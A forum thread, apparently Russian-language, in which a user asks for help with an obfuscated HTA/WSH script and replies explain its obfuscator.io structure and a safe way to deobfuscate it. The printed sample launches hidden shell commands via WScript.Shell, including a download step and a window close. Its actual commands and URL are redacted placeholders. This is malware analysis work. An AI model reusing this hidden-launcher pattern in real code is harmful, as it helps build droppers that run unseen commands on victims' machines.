
помогите с захламленным кодом JS

Прошу помощи понять, что здесь происходит: никакие сервисы/тулзы с гита не помогли.

JavaScript:
// Fragment of an obfuscator.io-style "rotate string array" prologue. Only the
// rotation loop was pasted: the decoder _0x2697 it calls and the string table
// function passed as _0x4c7b98 are not in this snippet (see the full listing below).
// _0x4c7b98: function returning the string table; _0x5498b1: the expected checksum.
function(_0x4c7b98,_0x5498b1){
    // Decoder shim: folds the index offset 390 in before calling the real decoder.
    function _0x348384(_0x36d4d5,_0x3bf4d6){
    return _0x2697(_0x3bf4d6-390,_0x36d4d5);
    }
    var _0x2ea161=_0x4c7b98();
    // !![] is just `true`: loop until the checksum matches.
    while(!![]){
        try{
        // Checksum over parseInt() of twelve table entries (strings such as
        // '76792dxXMHc' parse as their leading digits). Each divisor expression
        // in parentheses evaluates to a constant, 1 through 12 in order.
        var _0x3aed35=parseInt(_0x348384(866,870))/(-267*-7+-1080+2*-394)+-parseInt(_0x348384(871,865))/(-4513*1+9703*1+1297*-4)*(-parseInt(_0x348384(880,879))/(37*-115+3780+-478*-1))+-parseInt(_0x348384(869,874))/(-1469*3+4579+2*-84)*(parseInt(_0x348384(861,869))/(-2585+-1679+3*1423))+-parseInt(_0x348384(858,861))/(7843*1+1604+-9441)+-parseInt(_0x348384(865,875))/(-6425+-1401*-3+2229)*(-parseInt(_0x348384(876,868))/(29*-113+267*-2+1273*3))+parseInt(_0x348384(864,862))/(2*-4996+9137+864)*(parseInt(_0x348384(865,866))/(-2*-2608+1*4591+-9797))+-parseInt(_0x348384(880,872))/(9789+-3702+3038*-2)*(-parseInt(_0x348384(868,871))/(-8832+2227+-13*-509));
        // (poster's note) the numbers above were hex in the original; converted to decimal here
            if(_0x3aed35===_0x5498b1){
            break;
            }
            else{
            // Rotate the table left by one position and try again.
            _0x2ea161['push'](_0x2ea161['shift']());
            }
        }
        catch(_0x527d1a){
        // Any exception also just rotates and retries.
        _0x2ea161['push'](_0x2ea161['shift']());
        }
    }
}
 
Где функция _0x2697? Скинь, пожалуйста, весь исходный код и ничего не меняй.
<script>
// obfuscator.io "rotate string array" prologue. _0x4c7b98 is the function
// returning the string table (_0x3c83, passed at the bottom) and _0x5498b1 is
// the expected checksum. The table is rotated in place (the table function is
// memoized and hands out the same array) until the checksum over its
// parseInt()-able entries matches; only then do the fixed indexes used further
// down resolve to the intended strings.
(function(_0x4c7b98,_0x5498b1){
// Decoder shim: index offset 0x186 (= 390) is folded in before calling _0x2697.
function _0x348384(_0x36d4d5,_0x3bf4d6){
return _0x2697(_0x3bf4d6-0x186,_0x36d4d5);
}
var _0x2ea161=_0x4c7b98();
// !![] is just `true`: loop until the checksum matches.
while(!![]){
try{
// Checksum over parseInt() of twelve table entries (strings such as
// '76792dxXMHc' parse as their leading digits). Each divisor expression in
// parentheses evaluates to a constant, 1 through 12 in order.
var _0x3aed35=parseInt(_0x348384(866,870))/(-267*-7+-1080+2*-394)+-parseInt(_0x348384(871,865))/(-4513*1+9703*1+1297*-4)*(-parseInt(_0x348384(880,879))/(37*-115+3780+-478*-1))+-parseInt(_0x348384(869,874))/(-1469*3+4579+2*-84)*(parseInt(_0x348384(861,869))/(-2585+-1679+3*1423))+-parseInt(_0x348384(858,861))/(7843*1+1604+-9441)+-parseInt(_0x348384(865,875))/(-6425+-1401*-3+2229)*(-parseInt(_0x348384(876,868))/(29*-113+267*-2+1273*3))+parseInt(_0x348384(864,862))/(2*-4996+9137+864)*(parseInt(_0x348384(865,866))/(-2*-2608+1*4591+-9797))+-parseInt(_0x348384(880,872))/(9789+-3702+3038*-2)*(-parseInt(_0x348384(868,871))/(-8832+2227+-13*-509));
if(_0x3aed35===_0x5498b1){
break;
}
else{
// Rotate the table left by one position and try again.
_0x2ea161['push'](_0x2ea161['shift']());
}
}
catch(_0x527d1a){
// Any exception also just rotates and retries.
_0x2ea161['push'](_0x2ea161['shift']());
}
}
}
// The constant expression evaluates to 439925, the target checksum.
(_0x3c83,0x997f8+-0x4*-0x2ed57+-0xe96df));
// Implicit global holding a WScript.Shell COM object. ActiveXObject only exists
// under Windows Script Host / HTA (mshta) / legacy IE with ActiveX, so this is
// not browser JavaScript: every .Run() below starts a real process on the host.
// In a modern browser the line throws a ReferenceError and the sample is inert.
chuchukukukaokiwDasidow=new ActiveXObject('Wscript.Shell');
//SHELL
// Second decoder shim used by the payload. `- -0x226` adds 550 to the second
// argument before calling _0x2697 (which then subtracts 470), so the table
// index is simply the second argument + 80; the first argument is ignored.
function _0x39ea20(_0x10e904,_0x1b7ccd){
return _0x2697(_0x1b7ccd- -0x226,_0x10e904);
}
// Implicit global. 'p'+'o' is split to hide the prefix of the command string
// that the table entry (index 0 after rotation) completes; the deobfuscated
// listing further down shows it as "po" + the redacted "COMMAND HERE".
cmd='p'+'o'+_0x39ea20(-0x51,-0x50);
// (poster's note) above: a PowerShell command template
// (poster's note) below: more commands, taskkill and so on
// Method name is looked up through the table (resolves to 'run'/'Run').
// The second argument of every call is a constant expression that evaluates
// to 0, i.e. WScript.Shell.Run's window-style value for a hidden window
// (verify against the WSH documentation).
chuchukukukaokiwDasidow[_0x39ea20(-0x47,-0x3f)](cmd,-0x5*-0x712+-0x33b*0x8+0x982*-0x1);
// Builds one command line from two table strings around six literal double
// quotes; the URL entry of the table itself ends in three more quotes, so the
// final string carries the download location for the launched command.
chuchukukukaokiwDasidow['Run'](_0x39ea20(-0x45,-0x49)+'""""""'+_0x39ea20(-0x48,-0x43),-0x1035+-0x8*0x1b9+-0x3*-0x9ff);
chuchukukukaokiwDasidow['Run'](_0x39ea20(-0x3a,-0x40),0x1250+-0x71*0x11+-0xacf);
chuchukukukaokiwDasidow[_0x39ea20(-0x38,-0x3e)](_0x39ea20(-0x51,-0x4c),0x2559+0x11e2+-0x373b);
// String table. Entries such as '76792dxXMHc' exist only to feed the rotation
// checksum (parseInt keeps the leading digits); the remaining entries are the
// method names and command strings used by the payload. "COMMAND HERE",
// "ONE MORE COMMAND" and https://URL/URL look like redactions by the poster
// rather than the original sample's contents — confirm against the source file.
// On first call the function replaces itself with a closure returning the same
// array object, so the in-place rotation done by the prologue is shared by
// every later decoder call.
function _0x3c83(){
var _0x461479=['https://URL/URL"""','76792dxXMHc','77GlTYja','ONE MORE COMMAND','run','Run','417wnDEeb','COMMAND HERE','1872498haKtob','13788FlTpUQ','close','ONE MORE COMMAND','120CFJYAg','3290vVZUuc','ONE MORE COMMAND','168464TgKnkZ','165dizlcG','564775UHakgM','307044JXEoyH','33PtjPJs'];
_0x3c83=function(){
return _0x461479;
};
return _0x3c83();
}
// Fifth process launch; the command string is passed as a plain literal here
// (not through the table) and the window-style expression again evaluates to 0.
chuchukukukaokiwDasidow['Run']('ONE MORE COMMAND',-0x2616+0x3*-0x3e3+-0x3*-0x1095);
// The real decoder: a pure table lookup. The constant expression evaluates to
// 470, so the result is table[index - 470]; the second parameter is unused.
// Like the table function it rewrites itself on first use, so the lookup
// closure captures the (rotated) table array. Because this is only arithmetic
// and indexing, the whole string layer can be resolved offline by evaluating
// the table, the rotation loop and this function in an isolated interpreter.
function _0x2697(_0x33a664,_0x19cbe9){
var _0x114c99=_0x3c83();
_0x2697=function(_0x5ad690,_0x102572){
_0x5ad690=_0x5ad690-(-6*-217+-3139*2+5446);
var _0x48506d=_0x114c99[_0x5ad690];
return _0x48506d;};
return _0x2697(_0x33a664,_0x19cbe9);
}
// Resolves to window['close']() (see the deobfuscated listing below): the host
// window is closed after the commands have been launched, which together with
// the <script> wrapper suggests an HTA run by mshta.exe — confirm from the
// delivery file.
window[_0x39ea20(-0x47,-0x4d)]();

</script>
 
The threat actor behind this snippet has probably used the service https://obfuscator.io/ to obfuscate the code: the self-invoking array-rotation prologue, the `_0x…` identifiers, the string table with checksum-only entries and the self-replacing decoder are its characteristic output.

Example before obfuscating:


JavaScript:
// Paste your JavaScript code here

// Minimal input used to demonstrate the obfuscator: prints a greeting.
function hi() {

  console.log("Hello World!");

}

hi();




Example after obfuscating:


JavaScript:
// obfuscator.io output for the hi() example above. Same three-part shape as the sample: a self-invoking rotation prologue with target checksum 0x7f56d, a self-replacing decoder _0x3121 (table[index - 0x14f]) and the string table _0x3b21 whose only non-numeric entry is 'log', so console[_0x2120a2(0x156)] is console.log once the table has been rotated into place.
(function(_0x5a1468,_0x1107c0){var _0x108f7a=_0x3121,_0x374ba7=_0x5a1468();while(!![]){try{var _0x33fd51=parseInt(_0x108f7a(0x153))/0x1*(parseInt(_0x108f7a(0x152))/0x2)+-parseInt(_0x108f7a(0x14f))/0x3*(parseInt(_0x108f7a(0x151))/0x4)+-parseInt(_0x108f7a(0x158))/0x5+parseInt(_0x108f7a(0x150))/0x6+-parseInt(_0x108f7a(0x157))/0x7+-parseInt(_0x108f7a(0x155))/0x8*(-parseInt(_0x108f7a(0x15a))/0x9)+-parseInt(_0x108f7a(0x154))/0xa*(-parseInt(_0x108f7a(0x159))/0xb);if(_0x33fd51===_0x1107c0)break;else _0x374ba7['push'](_0x374ba7['shift']());}catch(_0x31c7c2){_0x374ba7['push'](_0x374ba7['shift']());}}}(_0x3b21,0x7f56d));function hi(){var _0x2120a2=_0x3121;console[_0x2120a2(0x156)]('Hello\x20World!');}function _0x3121(_0x55f726,_0x242608){var _0x3b21ef=_0x3b21();return _0x3121=function(_0x312165,_0xfb0776){_0x312165=_0x312165-0x14f;var _0x52600e=_0x3b21ef[_0x312165];return _0x52600e;},_0x3121(_0x55f726,_0x242608);}hi();function _0x3b21(){var _0x1ad550=['4013051AUprwZ','1608670MCEIOH','1023EdVDGw','23697OFBeVz','24909oWDxEp','3824262jSIqPw','404BjKsEf','422156gXPfyk','4ZsxUAR','31930oOYgQB','1448Lvcqcy','log'];_0x3b21=function(){return _0x1ad550;};return _0x3b21();}



There is no one-click tool that restores the original source, but this particular scheme is mechanical: the decoder is a plain table lookup (index minus a constant) and the prologue only rotates the table until a checksum matches, so you can evaluate the table function, the rotation loop and the decoder in an isolated JavaScript interpreter — never under WSH/mshta, where the ActiveXObject calls would actually launch the commands — substitute each decoder call with the string it yields, and then study the resulting behaviour to understand the end goal.
 
The threat actor behind this snippet has probably used the service https://obfuscator.io/ to obfuscate the code: the self-invoking array-rotation prologue, the `_0x…` identifiers, the string table with checksum-only entries and the self-replacing decoder are its characteristic output.

Example before obfuscating:


JavaScript:
// Paste your JavaScript code here

// Minimal input used to demonstrate the obfuscator: prints a greeting.
function hi() {

  console.log("Hello World!");

}

hi();




Example after obfuscating:


JavaScript:
// obfuscator.io output for the hi() example above. Same three-part shape as the sample: a self-invoking rotation prologue with target checksum 0x7f56d, a self-replacing decoder _0x3121 (table[index - 0x14f]) and the string table _0x3b21 whose only non-numeric entry is 'log', so console[_0x2120a2(0x156)] is console.log once the table has been rotated into place.
(function(_0x5a1468,_0x1107c0){var _0x108f7a=_0x3121,_0x374ba7=_0x5a1468();while(!![]){try{var _0x33fd51=parseInt(_0x108f7a(0x153))/0x1*(parseInt(_0x108f7a(0x152))/0x2)+-parseInt(_0x108f7a(0x14f))/0x3*(parseInt(_0x108f7a(0x151))/0x4)+-parseInt(_0x108f7a(0x158))/0x5+parseInt(_0x108f7a(0x150))/0x6+-parseInt(_0x108f7a(0x157))/0x7+-parseInt(_0x108f7a(0x155))/0x8*(-parseInt(_0x108f7a(0x15a))/0x9)+-parseInt(_0x108f7a(0x154))/0xa*(-parseInt(_0x108f7a(0x159))/0xb);if(_0x33fd51===_0x1107c0)break;else _0x374ba7['push'](_0x374ba7['shift']());}catch(_0x31c7c2){_0x374ba7['push'](_0x374ba7['shift']());}}}(_0x3b21,0x7f56d));function hi(){var _0x2120a2=_0x3121;console[_0x2120a2(0x156)]('Hello\x20World!');}function _0x3121(_0x55f726,_0x242608){var _0x3b21ef=_0x3b21();return _0x3121=function(_0x312165,_0xfb0776){_0x312165=_0x312165-0x14f;var _0x52600e=_0x3b21ef[_0x312165];return _0x52600e;},_0x3121(_0x55f726,_0x242608);}hi();function _0x3b21(){var _0x1ad550=['4013051AUprwZ','1608670MCEIOH','1023EdVDGw','23697OFBeVz','24909oWDxEp','3824262jSIqPw','404BjKsEf','422156gXPfyk','4ZsxUAR','31930oOYgQB','1448Lvcqcy','log'];_0x3b21=function(){return _0x1ad550;};return _0x3b21();}



There is no one-click tool that restores the original source, but this particular scheme is mechanical: the decoder is a plain table lookup (index minus a constant) and the prologue only rotates the table until a checksum matches, so you can evaluate the table function, the rotation loop and the decoder in an isolated JavaScript interpreter — never under WSH/mshta, where the ActiveXObject calls would actually launch the commands — substitute each decoder call with the string it yields, and then study the resulting behaviour to understand the end goal.
Thanks for the information — I will try to deobfuscate it using this approach.
 
JavaScript:
// Renamed copy of the obfuscated prologue: rotates the string table returned
// by saveNotifs until the checksum equals 439925 (the decimal value of the
// constant expression in the obfuscated listing). The 390 offset of the
// original shim has already been folded into the first getValue() argument
// here. Once the strings are inlined (below) this loop no longer influences
// the payload's behaviour; it is kept so the listing maps 1:1 onto the sample.
(function(saveNotifs, mmCoreNotDownloaded) {
    var keymod = saveNotifs();
    // Infinite loop; exits only via break when the checksum matches.
    for (; true;) {
        try {
            // parseInt() of twelve table entries, divisors 1..12 in order.
            var allsectionsstatus = parseInt(getValue(480, 866)) / 1 + -parseInt(getValue(475, 871)) / 2 * (-parseInt(getValue(489, 880)) / 3) + -parseInt(getValue(484, 869)) / 4 * (parseInt(getValue(479, 861)) / 5) + -parseInt(getValue(471, 858)) / 6 + -parseInt(getValue(485, 865)) / 7 * (-parseInt(getValue(478, 876)) / 8) + parseInt(getValue(472, 864)) / 9 * (parseInt(getValue(476, 865)) / 10) + -parseInt(getValue(482, 880)) / 11 * (-parseInt(getValue(481, 868)) / 12);
            if (allsectionsstatus === mmCoreNotDownloaded) {
                break;
            } else {
                // Rotate the table left by one position and retry.
                keymod.push(keymod.shift());
            }
        } catch (err) {
            // Any exception also just rotates and retries.
            keymod.push(keymod.shift());
        }
    }
}(saveNotifs, 439925));



// The actual payload with table lookups replaced by their strings: a
// WScript.Shell object (WSH/HTA only, not browser JS) launching five hidden
// processes (window style 0). The command strings shown are placeholders —
// "COMMAND HERE", "ONE MORE COMMAND", https://URL/URL — so the real commands
// (the poster describes a PowerShell template and taskkill calls) must be
// taken from the original sample. Note the leading/trailing quotes on these
// literals do not appear on the corresponding entries of the saveNotifs table;
// presumably a redaction artefact — confirm against the original.
chuchukukukaokiwDasidow = new ActiveXObject("Wscript.Shell");
// 'po' + table entry in the original; cmd is assigned but the literal is passed below.
cmd = "poCOMMAND HERE";
chuchukukukaokiwDasidow["run"]('poCOMMAND HERE', 0);
// Second command carries the download URL, quoted with six embedded double quotes.
chuchukukukaokiwDasidow.Run('"ONE MORE COMMAND""""""https://URL/URL""""', 0);
chuchukukukaokiwDasidow.Run('"ONE MORE COMMAND"', 0);
chuchukukukaokiwDasidow["Run"]('"ONE MORE COMMAND"', 0)

// String table (renamed _0x3c83). Numeric-prefixed entries only feed the
// rotation checksum; the rest are the method names and (redacted) command
// strings. Replaces itself with a closure returning the same array object, so
// the prologue's in-place rotation is visible to every later lookup.
function saveNotifs() {
    var platformCommands = ['https://URL/URL"""', "76792dxXMHc", "77GlTYja", "ONE MORE COMMAND", "run", "Run", "417wnDEeb", "COMMAND HERE", "1872498haKtob", "13788FlTpUQ", "close", "ONE MORE COMMAND", "120CFJYAg", "3290vVZUuc", "ONE MORE COMMAND", "168464TgKnkZ", "165dizlcG", "564775UHakgM", "307044JXEoyH", "33PtjPJs"];
    saveNotifs = function() {
        return platformCommands;
    };
    return saveNotifs();
}

// Fifth hidden process launch; this literal was not table-encoded in the sample either.
chuchukukukaokiwDasidow.Run("ONE MORE COMMAND", 0);

// Decoder (renamed _0x2697): returns table[val - 470]; the second parameter is
// never used. Rewrites itself on first call so the closure captures the table
// array. Being pure arithmetic plus indexing, it can be evaluated offline to
// recover every string without running the payload.
function getValue(val, totalExpectedResults) {
    var _ball = saveNotifs();
    getValue = function(i, totalExpectedResults) {
        i = i - 470;
        var ball = _ball[i];
        return ball;
    };
    return getValue(val, totalExpectedResults);
}

// Closes the host window after the processes have been started (HTA-style
// self-termination — confirm the delivery format from the original file).
window["close"]();
 

